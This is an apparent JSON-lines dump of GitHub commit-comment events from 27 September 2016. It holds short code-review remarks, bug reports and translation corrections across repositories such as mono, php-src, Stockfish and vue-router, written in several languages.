{"id":"4623859979","type":"CommitCommentEvent","actor":{"login":"lewurm"},"repo":{"name":"mono/mono"},"payload":{"comment":{"id":19189710,"position":7,"line":106,"path":"mono/mini/ir-emit.h","commit_id":"aae997259ac7b4fb9befed3d2394721767071216","created_at":"2016-09-27T12:31:50Z","updated_at":"2016-09-27T12:31:50Z","body":"`s/MonoConfig/MonoCompile`"}},"created_at":"2016-09-27T12:31:50Z"}
{"id":"4623861429","type":"CommitCommentEvent","actor":{"login":"ricochet99"},"repo":{"name":"ricochet99/repository_learn"},"payload":{"comment":{"id":19189715,"position":null,"line":null,"path":null,"commit_id":"a573b0535a700e38404e885129b1e091817c2315","created_at":"2016-09-27T12:32:09Z","updated_at":"2016-09-27T12:32:09Z","body":"Kommentar zur ersten Zeile Flugzeug"}},"created_at":"2016-09-27T12:32:09Z"}
{"id":"4623862770","type":"CommitCommentEvent","actor":{"login":"coryjfowler"},"repo":{"name":"coryjfowler/MCP_CAN_lib"},"payload":{"comment":{"id":19189719,"position":null,"line":null,"path":null,"commit_id":"14db2dcafc24f00b467c4e139bfa22d875a11c90","created_at":"2016-09-27T12:32:24Z","updated_at":"2016-09-27T12:32:24Z","body":"The functionality didn't exist until a few moments ago, update the library you have and enOneShotTX() should enable one shot transmission mode and disOneShotTX() will disable it."}},"created_at":"2016-09-27T12:32:24Z"}
{"id":"4623863268","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189721,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T12:32:30Z","updated_at":"2016-09-27T12:32:30Z","body":"See above ... I simply can not reproduce.\r\nGive the tuner some seconds to become free, it's not instant."}},"created_at":"2016-09-27T12:32:30Z"}
{"id":"4623863383","type":"CommitCommentEvent","actor":{"login":"nikic"},"repo":{"name":"zendtech/php-src"},"payload":{"comment":{"id":19189722,"position":52,"line":659,"path":"ext/opcache/jit/zend_jit.c","commit_id":"5f025e330bb2e2fe3363ba860a882ed1f0258e6b","created_at":"2016-09-27T12:32:32Z","updated_at":"2016-09-27T12:32:32Z","body":"Why are these extra checks necessary? Isn't this the same code that zend_inference uses to set `[res].range.underflow`?"}},"created_at":"2016-09-27T12:32:32Z"}
{"id":"4623864883","type":"CommitCommentEvent","actor":{"login":"chteuchteu"},"repo":{"name":"munin-monitoring/munin-monitoring.github.io"},"payload":{"comment":{"id":19189730,"position":null,"line":null,"path":null,"commit_id":"024f5fc0340029b0772a724f287257d85cfe6420","created_at":"2016-09-27T12:32:51Z","updated_at":"2016-09-27T12:32:51Z","body":"Thanks for adding the repo here! I will delete the one on my own account then\r\n\r\nAbout this specific commit: do you understand the purpose of a robots.txt file? ([more information here](http://www.robotstxt.org/)) That's not about dynamic content, more a SEO thing"}},"created_at":"2016-09-27T12:32:51Z"}
{"id":"4623865365","type":"CommitCommentEvent","actor":{"login":"FauziAkram"},"repo":{"name":"FauziAkram/Stockfish"},"payload":{"comment":{"id":19189732,"position":null,"line":null,"path":null,"commit_id":"b0cc696cf1a6b7b05cb823a9a6b23519059666f0","created_at":"2016-09-27T12:32:57Z","updated_at":"2016-09-27T12:32:57Z","body":"I see, But if we have here a bonus for a Rook attacking a pawn, then why do we have a RookOnPawn bonus?\r\nI mean, wouldn't we just remove the Rookonpawn code and just adding up the bonus into the S(0, 25) ?"}},"created_at":"2016-09-27T12:32:57Z"}
{"id":"4623866530","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189735,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T12:33:11Z","updated_at":"2016-09-27T12:33:11Z","body":"i know that it normally takes few seconds. but i am now waiting 5 minutes.\r\n"}},"created_at":"2016-09-27T12:33:11Z"}
{"id":"4623869661","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189744,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T12:33:49Z","updated_at":"2016-09-27T12:33:49Z","body":"are you trying using transcoding from a PC with VLC? or from another box/device"}},"created_at":"2016-09-27T12:33:49Z"}
{"id":"4623870084","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19189746,"position":127,"line":109,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"b02e29a5ada82f54f327ed5159fa699de6d33351","created_at":"2016-09-27T12:33:55Z","updated_at":"2016-09-27T12:33:55Z","body":"ещё можешь передавать в функцию теста параметр int test_number, чтобы его печатать в случае ошибки.\r\n\r\nв main() это будет выглядить как-то так \r\n\r\n`\r\nchar[][] test_cases = char{\"string 1\", \"string, 2\"}; // и так далее\r\nfor (int i = 0; i < test_cases_number; i++) {\r\n    words_in_file_test(test_cases[i], strlen(test_cases[i]), i);\r\n}\r\n`"}},"created_at":"2016-09-27T12:33:55Z"}
{"id":"4623871515","type":"CommitCommentEvent","actor":{"login":"Shmel1k"},"repo":{"name":"SlavaShake/mail_tehnopark"},"payload":{"comment":{"id":19189749,"position":127,"line":109,"path":"begginer_c_cpp/dz_1/main.c","commit_id":"b02e29a5ada82f54f327ed5159fa699de6d33351","created_at":"2016-09-27T12:34:11Z","updated_at":"2016-09-27T12:34:11Z","body":"вёрстка сбилась, но суть отражена"}},"created_at":"2016-09-27T12:34:11Z"}
{"id":"4623871813","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19189751,"position":null,"line":null,"path":null,"commit_id":"dea83dbd376f22d2eff4c844392cc9301e3fb98e","created_at":"2016-09-27T12:34:14Z","updated_at":"2016-09-27T12:34:14Z","body":"Well, what can I say?\r\nThe error\r\n`14:28:47.344 { E } /usr/lib/python2.7/site-packages/twisted/logger/_file.py:66 __call__ Unhandled error in Deferred:\r\n14:28:47.346 { E } /usr/lib/python2.7/site-packages/twisted/logger/_file.py:66 __call__\r\n\r\nTraceback (most recent call last):\r\nFailure: twisted.internet.error.ConnectionLost: Connection to the other side was lost in a non-clean fashion.`\r\n**has** occured, it's just not fatal anymore."}},"created_at":"2016-09-27T12:34:14Z"}
{"id":"4623872195","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19189752,"position":null,"line":null,"path":null,"commit_id":"a475a37fb3d79ff849dbea822fc83956c25f0552","created_at":"2016-09-27T12:34:18Z","updated_at":"2016-09-27T12:34:18Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#OFdKEpZhSnWhsGeQlX3dhw"}},"created_at":"2016-09-27T12:34:18Z"}
{"id":"4623877695","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19189769,"position":56,"line":56,"path":"docs/zh-cn/essentials/redirect-and-alias.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T12:35:26Z","updated_at":"2016-09-27T12:35:26Z","body":"这里英文没删掉！"}},"created_at":"2016-09-27T12:35:26Z"}
{"id":"4623879184","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"kubespray/kargo"},"payload":{"comment":{"id":19189770,"position":null,"line":null,"path":null,"commit_id":"336e2b8c84948a744ffe1db8f55039cc03906d34","created_at":"2016-09-27T12:35:43Z","updated_at":"2016-09-27T12:35:43Z","body":":+1: "}},"created_at":"2016-09-27T12:35:43Z"}
{"id":"4623879928","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"kubespray/kargo"},"payload":{"comment":{"id":19189776,"position":null,"line":null,"path":null,"commit_id":"336e2b8c84948a744ffe1db8f55039cc03906d34","created_at":"2016-09-27T12:35:53Z","updated_at":"2016-09-27T12:35:53Z","body":"I think this requires no CI"}},"created_at":"2016-09-27T12:35:53Z"}
{"id":"4623885601","type":"CommitCommentEvent","actor":{"login":"Chronophobe"},"repo":{"name":"software-engineering-amsterdam/ST-2016-wo1-5"},"payload":{"comment":{"id":19189796,"position":29,"line":52,"path":"Week3/ahmed/Exercise3.hs","commit_id":"c17efedd28c7a9261c6e25ff783722bedc0a66a4","created_at":"2016-09-27T12:37:01Z","updated_at":"2016-09-27T12:37:01Z","body":"Haha, nice one."}},"created_at":"2016-09-27T12:37:01Z"}
{"id":"4623886501","type":"CommitCommentEvent","actor":{"login":"aldeasm1"},"repo":{"name":"1601-mma2013/Virgo"},"payload":{"comment":{"id":19189805,"position":null,"line":null,"path":null,"commit_id":"26acca092b1dc11fe395a9ab60ccd625c5347f8b","created_at":"2016-09-27T12:37:12Z","updated_at":"2016-09-27T12:37:12Z","body":"Virgo Virgo"}},"created_at":"2016-09-27T12:37:12Z"}
{"id":"4623888465","type":"CommitCommentEvent","actor":{"login":"deirdresm"},"repo":{"name":"PokemonGoMap/PokemonGo-Map"},"payload":{"comment":{"id":19189812,"position":null,"line":null,"path":null,"commit_id":"f3b4efb51a27820a858e450f432246c9f5051a96","created_at":"2016-09-27T12:37:33Z","updated_at":"2016-09-27T12:37:33Z","body":"Okay, I forgot one of the npm steps after updating, and now that I've done that, I'm seeing what I should be."}},"created_at":"2016-09-27T12:37:33Z"}
{"id":"4623899747","type":"CommitCommentEvent","actor":{"login":"grahamc"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19189834,"position":5,"line":8,"path":"nixos/modules/services/web-servers/apache-httpd/wordpress.nix","commit_id":"4671806183e05e839fa4fe9459079ad527e52905","created_at":"2016-09-27T12:39:49Z","updated_at":"2016-09-27T12:39:49Z","body":":D I added that for the same reason you didn't upgrade it -- too hard to know if it works. I tried the same over for mediawiki, but it was basically a disaster and I couldn't even get it working to start with."}},"created_at":"2016-09-27T12:39:49Z"}
{"id":"4623900479","type":"CommitCommentEvent","actor":{"login":"MeowMeowKins"},"repo":{"name":"grafana/grafana"},"payload":{"comment":{"id":19189837,"position":null,"line":null,"path":null,"commit_id":"04ef25b6ff4d631bab5d9eb7aa7617356d322419","created_at":"2016-09-27T12:39:58Z","updated_at":"2016-09-27T12:39:58Z","body":"Even after I tried this fix solution, I still get the error:\r\nDashboard init failed\r\nTemplate variables could not be initialized: b.metricFindQuery is not a function"}},"created_at":"2016-09-27T12:39:58Z"}
{"id":"4623901592","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19189841,"position":12,"line":12,"path":"docs/zh-cn/essentials/history-mode.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T12:40:12Z","updated_at":"2016-09-27T12:40:12Z","body":"When using history mode, the URL will look \"normal,\" e.g. http://oursite.com/user/id. Beautiful!\r\n这句没翻译！"}},"created_at":"2016-09-27T12:40:12Z"}
{"id":"4623905602","type":"CommitCommentEvent","actor":{"login":"Chatthameth"},"repo":{"name":"Chatthameth/Tennis_work"},"payload":{"comment":{"id":19189853,"position":null,"line":null,"path":null,"commit_id":"0f9a30bb07dc1c5f2d556fb9518c2b86fc19db68","created_at":"2016-09-27T12:41:00Z","updated_at":"2016-09-27T12:41:00Z","body":"อันนี้ทดสอบโดยใช้โค้ดตัวอย่างที่ อจ สอนไว้ในคาบ"}},"created_at":"2016-09-27T12:41:00Z"}
{"id":"4623908964","type":"CommitCommentEvent","actor":{"login":"baldimir"},"repo":{"name":"cimbalek/drools"},"payload":{"comment":{"id":19189861,"position":60,"line":75,"path":"drools-compiler/src/test/java/org/drools/compiler/integrationtests/DeleteTest.java","commit_id":"b0ea323a606f085fdd24e796db9d0d661cb05da7","created_at":"2016-09-27T12:41:40Z","updated_at":"2016-09-27T12:41:40Z","body":"This could be probably extracted to @After method. "}},"created_at":"2016-09-27T12:41:40Z"}
{"id":"4623910761","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19189865,"position":38,"line":164,"path":"resources/qml/MonitorButton.qml","commit_id":"f4d13713a2206df714fbe6c0ed5dac070711ba15","created_at":"2016-09-27T12:42:00Z","updated_at":"2016-09-27T12:42:00Z","body":"True. I've copied this from one of the 4-5 other places in this file where it obtains this state. My first thought was that there might be multiple printerOutputDevices and it might be getting the wrong state..."}},"created_at":"2016-09-27T12:42:00Z"}
{"id":"4623911802","type":"CommitCommentEvent","actor":{"login":"tailhook"},"repo":{"name":"tailhook/vagga"},"payload":{"comment":{"id":19189867,"position":7,"line":85,"path":"src/process_util.rs","commit_id":"5c0b99dbbd85dc78769a3106f05f3a438dffba5a","created_at":"2016-09-27T12:42:12Z","updated_at":"2016-09-27T12:42:12Z","body":"Please be more specific. We don't have arbitrary nested processes in vagga. Please say that we should pass `true` in `vagga_wrapper` and `false` in launcher or vica versa.\r\n\r\nAlso, it's unclear why only \"toplevel should take back tty\", for example if we have:\r\n\r\na -> b -> c\r\n\r\nIf only `a` takes back tty, and if `c` is an interactive command, then if `c` and  `b` stays alive we have a frozen system which you cant kill by pressing `Ctrl+C`. Or am I wrong?"}},"created_at":"2016-09-27T12:42:12Z"}
{"id":"4623912968","type":"CommitCommentEvent","actor":{"login":"pnorman"},"repo":{"name":"gravitystorm/openstreetmap-carto"},"payload":{"comment":{"id":19189871,"position":null,"line":null,"path":null,"commit_id":"02b10e2d7660134f7067af45eaafb235a52c6820","created_at":"2016-09-27T12:42:26Z","updated_at":"2016-09-27T12:42:26Z","body":"Yes. I'm on the train so can't fix it for awhile, so if someone else can that would be good."}},"created_at":"2016-09-27T12:42:26Z"}
{"id":"4623916034","type":"CommitCommentEvent","actor":{"login":"Pbeitelmann"},"repo":{"name":"Looking4Group/L4G_Core"},"payload":{"comment":{"id":19189879,"position":null,"line":null,"path":null,"commit_id":"442fbf019f5bb7c68fc85f4bacbcba0b8b1dd24c","created_at":"2016-09-27T12:43:03Z","updated_at":"2016-09-27T12:43:03Z","body":"The command is quite light; Basically it only gets the threatlist and prints it. Getting the threatlist is, due to its rudimentary nature, something that is performed at a very high frequency in the core already.\r\nEven with a larger userbase the usage of this command wouldn't pose a problem."}},"created_at":"2016-09-27T12:43:03Z"}
{"id":"4623920352","type":"CommitCommentEvent","actor":{"login":"cagataycivici"},"repo":{"name":"primefaces/primeng"},"payload":{"comment":{"id":19189889,"position":null,"line":null,"path":null,"commit_id":"30d4c918ca82b4dafaea0433a5332c625148bdbb","created_at":"2016-09-27T12:43:53Z","updated_at":"2016-09-27T12:43:53Z","body":"Fixes #473 actually"}},"created_at":"2016-09-27T12:43:53Z"}
{"id":"4623926044","type":"CommitCommentEvent","actor":{"login":"leobelini"},"repo":{"name":"leobelini/guiapet"},"payload":{"comment":{"id":19189896,"position":null,"line":null,"path":null,"commit_id":"c54a310985c9edeeaff05479c478c0168a65f094","created_at":"2016-09-27T12:44:59Z","updated_at":"2016-09-27T12:44:59Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Visualizar estabelecimento](https://trello.com/c/XyiBojTE/2-visualizar-estabelecimento)"}},"created_at":"2016-09-27T12:44:59Z"}
{"id":"4623926928","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"component/path-to-regexp"},"payload":{"comment":{"id":19189897,"position":null,"line":null,"path":null,"commit_id":"d3e084b4c52e5a3d6b762511d0912e61c136bbbf","created_at":"2016-09-27T12:45:10Z","updated_at":"2016-09-27T12:45:10Z","body":"[workbench_materials.zip](https://github.com/component/path-to-regexp/files/495498/workbench_materials.zip)\r\n"}},"created_at":"2016-09-27T12:45:10Z"}
{"id":"4623931759","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"component/path-to-regexp"},"payload":{"comment":{"id":19189908,"position":null,"line":null,"path":null,"commit_id":"d3e084b4c52e5a3d6b762511d0912e61c136bbbf","created_at":"2016-09-27T12:46:07Z","updated_at":"2016-09-27T12:46:07Z","body":" \r\n+The MIT License (MIT) \r\n\r\n\r\n \r\n+ \r\n\r\n\r\n \r\n+Copyright (c) 2014 Component \r\n\r\n\r\n \r\n+ \r\n\r\n\r\n \r\n+Permission is hereby granted, free of charge, to any person obtaining a copy \r\n\r\n\r\n \r\n+of this software and associated documentation files (the \"Software\"), to deal \r\n\r\n\r\n \r\n+in the Software without restriction, including without limitation the rights \r\n\r\n\r\n \r\n+to use, copy, modify, merge, publish, distribute, sublicense, and/or sell \r\n\r\n\r\n \r\n+copies of the Software, and to permit persons to whom the Software is \r\n\r\n\r\n \r\n+furnished to do so, subject to the following conditions: \r\n\r\n\r\n \r\n+ \r\n\r\n\r\n \r\n+The above copyright notice and this permission notice shall be included in all \r\n\r\n\r\n \r\n+copies or substantial portions of the Software. \r\n\r\n\r\n \r\n+ \r\n\r\n\r\n \r\n+THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR \r\n\r\n\r\n \r\n+IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, \r\n\r\n\r\n \r\n+FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE \r\n\r\n\r\n \r\n+AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER \r\n\r\n\r\n \r\n+LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, \r\n\r\n\r\n \r\n+OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE \r\n\r\n\r\n \r\n+SOFTWARE. "}},"created_at":"2016-09-27T12:46:07Z"}
{"id":"4623932386","type":"CommitCommentEvent","actor":{"login":"dstollie"},"repo":{"name":"themosis/framework"},"payload":{"comment":{"id":19189909,"position":null,"line":null,"path":null,"commit_id":"8becbe71046f583664accb3905b1d1dccda36a5a","created_at":"2016-09-27T12:46:14Z","updated_at":"2016-09-27T12:46:14Z","body":"Seems to be working as expected!"}},"created_at":"2016-09-27T12:46:14Z"}
{"id":"4623935303","type":"CommitCommentEvent","actor":{"login":"darren562"},"repo":{"name":"zhenyong/vue-router"},"payload":{"comment":{"id":19189916,"position":32,"line":32,"path":"docs/zh-cn/advanced/navigation-guards.md","commit_id":"4616ab25e2b78206114bb473d10ac87b896215c5","created_at":"2016-09-27T12:46:49Z","updated_at":"2016-09-27T12:46:49Z","body":"不能影响改变影响导航\r\n改成： 不能改变导航"}},"created_at":"2016-09-27T12:46:49Z"}
{"id":"4623935482","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"tonypatryn/relaxr-landing-page"},"payload":{"comment":{"id":19189917,"position":40,"line":40,"path":"index.html","commit_id":"d5a9fbf687d50ec966a2d72e0d3c629c266a0f6f","created_at":"2016-09-27T12:46:51Z","updated_at":"2016-09-27T12:46:51Z","body":"Let's use one of the centering techniques in css instead of using the html element. Also remember only 1 `<h1>` is allowed per page. This should've been an `<a>` tag along with the one in the header."}},"created_at":"2016-09-27T12:46:51Z"}
{"id":"4623940744","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"tonypatryn/relaxr-landing-page"},"payload":{"comment":{"id":19189929,"position":42,"line":42,"path":"index.html","commit_id":"d5a9fbf687d50ec966a2d72e0d3c629c266a0f6f","created_at":"2016-09-27T12:47:52Z","updated_at":"2016-09-27T12:47:52Z","body":"The links here didn't have to be floated, you could've stuck with inline-block like in you wrapper. Also, let's keep all styles in the style.css file."}},"created_at":"2016-09-27T12:47:52Z"}
{"id":"4623941610","type":"CommitCommentEvent","actor":{"login":"BerserkerTroll"},"repo":{"name":"root-mirror/root"},"payload":{"comment":{"id":19189932,"position":8,"line":69,"path":"interpreter/llvm/src/tools/clang/lib/AST/TemplateBase.cpp","commit_id":"8dff24d0b687e3b2781e00697d32983a9d4d7b52","created_at":"2016-09-27T12:48:02Z","updated_at":"2016-09-27T12:48:02Z","body":"Uncrustify, unlike clang-format, has, among its ~500 options, two useful ones:\r\n> indent_bool_paren                                 { False, True }\r\n>  Controls the indent of a BOOL operator when inside a paren.If TRUE, aligns under the open paren\r\n\r\n> indent_first_bool_expr                            { False, True }\r\n>   If 'indent_bool_paren' is true, controls the indent of the first expression. If TRUE, aligns the first expression to the following ones\r\n\r\nIf set both of them to `True`, the code will be formatted like [here](https://gist.github.com/BerserkerTroll/23dacdc08d0cfeacd9e8be061f71f1d3)"}},"created_at":"2016-09-27T12:48:02Z"}
{"id":"4623942361","type":"CommitCommentEvent","actor":{"login":"gaearon"},"repo":{"name":"facebook/jest"},"payload":{"comment":{"id":19189936,"position":null,"line":null,"path":null,"commit_id":"63ac0fd83ad9befd9162b87d4a754278bd85e3c4","created_at":"2016-09-27T12:48:10Z","updated_at":"2016-09-27T12:48:10Z","body":"🌠 "}},"created_at":"2016-09-27T12:48:10Z"}
{"id":"4623943830","type":"CommitCommentEvent","actor":{"login":"jamesbascle"},"repo":{"name":"Jagged/OneOf"},"payload":{"comment":{"id":19189941,"position":null,"line":null,"path":null,"commit_id":"1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11","created_at":"2016-09-27T12:48:26Z","updated_at":"2016-09-27T12:48:26Z","body":"I definitely think inheritance is fine, and should definitely be supported.\nBut like you say it's intended to be just ONE.  In fact, a matching\nconstruct like this is just the functional equivalent of a polymorphic\nhierarchy, in my opinion.  Since C# compiler automatically selects the most\nspecific overload on create, this won't be a problem.  It will always\nexecute the most specific case available, and fall through to\notherwise/fail if there's no match. We just have to make sure we actually\ncapture that information at the start for later use.\n\nI'm with you on the LOB use case.  If it turned out to be a killer feature\nto optimize for games, i have a couple of ideas on the matcher, but it\nwould involve an N^2 blow up in the interfaces that an OneOfMatcher\nimplements.  This is not an actual problem, since the theoretical limit is\naround 16 million interfaces, and even if we went to 20 type parameters we\nwouldn't hit that.....it woujld bring T4 to a halt though, lol.  In reality\nit ends up at 512 for the 9 we're doing now, which is totally reasonable,\nIMO, if we go that route.\n\nSuffice to say, i think this is LOB focused, at least for the moment.\n\nI'm working on making sure the original implicit operator called makes it's\nway through the whole pipeline, but it gets a bit dicey.\n\n\n\n\n\nOn Tue, Sep 27, 2016 at 7:34 AM, Will Mooar <notifications@github.com>\nwrote:\n\n> It all comes down to a design decision - do we allow inheritance or not.\n> That (ideally) should be driven by use-cases, and ultimately unit tests to\n> prove we meet those use-cases. It was you that convinced me to go back to\n> using is for flexibility, so I'd like to keep that if poss. eg. OneOf,\n> where Exception could be many types of exceptions. Expect me to hassle you\n> if you've changed your mind! lol\n>\n> Hmm, I really dislike ambiguous types. I think we should refuse/fail if\n> someone tries to do something like you mentioned, which we can do via the\n> static constructor. It's supposed to be *ONE* of them. That doesn't mean\n> we necessarily disallow inheritance, just that the Tn's cannot be derived\n> from any of the other Tn's. eg OneOf is OK, but OneOf is not.\n>\n> Thoughts?\n>\n> ps. I felt removing index helped maintainability, which for me has a\n> higher priority over optimisation at this point. Anyone writing a game or\n> other time-sensitive code would probably be mad using OneOf, it's better\n> suited for line-of-business kind of code. eg website backend stuff. But,\n> maybe I'm wrong? If there's a strong enough case for it we could\n> reintroduce it, but then also for optimisation sake we may need to go back\n> to the original Match and Switch methods to avoid the overheads of calling\n> When multiple times. At that point we might as well give up. So, thinking\n> on it, this version of OneOf is aiming at compile-time checks and\n> ease-of-use from a developer's viewpoint, at the slight expense of a few\n> cpu cycles. I can live with that. I value my time over the cpus!\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Jagged/OneOf/commit/1dc67297c2a8f233e9cc0de6bcc2cfc979ba0f11#commitcomment-19188931>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD_ohRbaB4TcAILU6f_7dV-1TTgp5NELks5quP89gaJpZM4KGnj9>\n> .\n>\n"}},"created_at":"2016-09-27T12:48:26Z"}
{"id":"4623945326","type":"CommitCommentEvent","actor":{"login":"olivergondza"},"repo":{"name":"jenkinsci/proc-cleaner-plugin"},"payload":{"comment":{"id":19189943,"position":20,"line":45,"path":"src/main/java/org/jenkinsci/plugins/proccleaner/PsBasedHPUXProcessTree.java","commit_id":"c89018a06505c8ef05282f6a9ae2cb150635d9ba","created_at":"2016-09-27T12:48:43Z","updated_at":"2016-09-27T12:48:43Z","body":"`Array.toString()` is a jerk.\r\n```\r\nSep 27, 2016 6:18:08 AM org.jenkinsci.plugins.proccleaner.PsBasedUnixProcessTree createProcessTreeFor\r\nWARNING: 'ps' command invocation [Ljava.lang.String;@21657f failed!\r\n```"}},"created_at":"2016-09-27T12:48:43Z"}
{"id":"4623950631","type":"CommitCommentEvent","actor":{"login":"wingchi"},"repo":{"name":"chakrm/TheXEffect"},"payload":{"comment":{"id":19189958,"position":10,"line":30,"path":"scripts/js/app.js","commit_id":"3665cd49aaeffc23d4be62d9c4a701f3f3018109","created_at":"2016-09-27T12:49:44Z","updated_at":"2016-09-27T12:49:44Z","body":"Use camel case instead: `getTodos()`"}},"created_at":"2016-09-27T12:49:44Z"}
{"id":"4623952851","type":"CommitCommentEvent","actor":{"login":"Coduz"},"repo":{"name":"eurotech/kapua"},"payload":{"comment":{"id":19189962,"position":null,"line":null,"path":null,"commit_id":"d79e1de77c13c54c63d1eda35bff9c3f350a46b2","created_at":"2016-09-27T12:50:10Z","updated_at":"2016-09-27T12:50:10Z","body":"@hekonsek why this change? "}},"created_at":"2016-09-27T12:50:10Z"}
{"id":"4623953487","type":"CommitCommentEvent","actor":{"login":"KnightMiner"},"repo":{"name":"SlimeKnights/TinkersConstruct"},"payload":{"comment":{"id":19189963,"position":null,"line":null,"path":null,"commit_id":"8f0bd3efd7e6fc4e63844cdfee5a274a935694e1","created_at":"2016-09-27T12:50:16Z","updated_at":"2016-09-27T12:50:16Z","body":"Version in Mantle has similar code to the old one, as I choose to extend EnumBlockSmeltery rather than  EnumBlockConnected here"}},"created_at":"2016-09-27T12:50:16Z"}
{"id":"4623961692","type":"CommitCommentEvent","actor":{"login":"kimgoulb"},"repo":{"name":"tonypatryn/relaxr-landing-page"},"payload":{"comment":{"id":19189985,"position":121,"line":121,"path":"css/style.css","commit_id":"d5a9fbf687d50ec966a2d72e0d3c629c266a0f6f","created_at":"2016-09-27T12:51:47Z","updated_at":"2016-09-27T12:51:47Z","body":"You could've consolidated these styles into one class, eg \"button\" and then added an extra class to address the different colors."}},"created_at":"2016-09-27T12:51:47Z"}
{"id":"4623970293","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"component/path-to-regexp"},"payload":{"comment":{"id":19190006,"position":null,"line":null,"path":null,"commit_id":"d3e084b4c52e5a3d6b762511d0912e61c136bbbf","created_at":"2016-09-27T12:53:29Z","updated_at":"2016-09-27T12:53:29Z","body":"d3e084b4c52e5a3d6b762511d0912e61c136bbbf"}},"created_at":"2016-09-27T12:53:29Z"}
{"id":"4623971054","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"component/path-to-regexp"},"payload":{"comment":{"id":19190011,"position":null,"line":null,"path":null,"commit_id":"d3e084b4c52e5a3d6b762511d0912e61c136bbbf","created_at":"2016-09-27T12:53:38Z","updated_at":"2016-09-27T12:53:38Z","body":"d3e084b"}},"created_at":"2016-09-27T12:53:38Z"}
{"id":"4623971645","type":"CommitCommentEvent","actor":{"login":"alkozko"},"repo":{"name":"7yon/C_SharpCourse"},"payload":{"comment":{"id":19190013,"position":103,"line":83,"path":"TheAreaOfATriangle/TheAreaOfATriangle/Triangle.cs","commit_id":"3c0ed9b27795f1336c0581873c00d639c76550fd","created_at":"2016-09-27T12:53:45Z","updated_at":"2016-09-27T12:53:45Z","body":"Плохое решение, получается что у вас можно вызвать Area до того, как она будет рассчитана?\r\nНадо или сделать расчет Area автоматическим, при создании треугольника, тогда этот метод будет приватным.\r\nИли убрать существование свойства Area вообще и сделать чтобы этот метод возвращал плащадь сам"}},"created_at":"2016-09-27T12:53:45Z"}
{"id":"4623972174","type":"CommitCommentEvent","actor":{"login":"kjytestPro"},"repo":{"name":"kjytestPro/hello-world"},"payload":{"comment":{"id":19190014,"position":null,"line":null,"path":null,"commit_id":"e0862e689ca9a3fa1cfd72db9eb92add70af8c27","created_at":"2016-09-27T12:53:51Z","updated_at":"2016-09-27T12:53:51Z","body":"AA"}},"created_at":"2016-09-27T12:53:51Z"}
{"id":"4623972591","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/repo"},"payload":{"comment":{"id":19190015,"position":10,"line":6,"path":"pkgbuild-introspection-git/PKGBUILD","commit_id":"023066b0a28a28419b869bc18d29b607c6a6bc31","created_at":"2016-09-27T12:53:56Z","updated_at":"2016-09-27T12:53:56Z","body":"这个是从 AUR 上取的呀。"}},"created_at":"2016-09-27T12:53:56Z"}
{"id":"4623974517","type":"CommitCommentEvent","actor":{"login":"Braidis"},"repo":{"name":"component/path-to-regexp"},"payload":{"comment":{"id":19190024,"position":null,"line":null,"path":null,"commit_id":"d3e084b4c52e5a3d6b762511d0912e61c136bbbf","created_at":"2016-09-27T12:54:17Z","updated_at":"2016-09-27T12:54:17Z","body":"d3e084b"}},"created_at":"2016-09-27T12:54:17Z"}
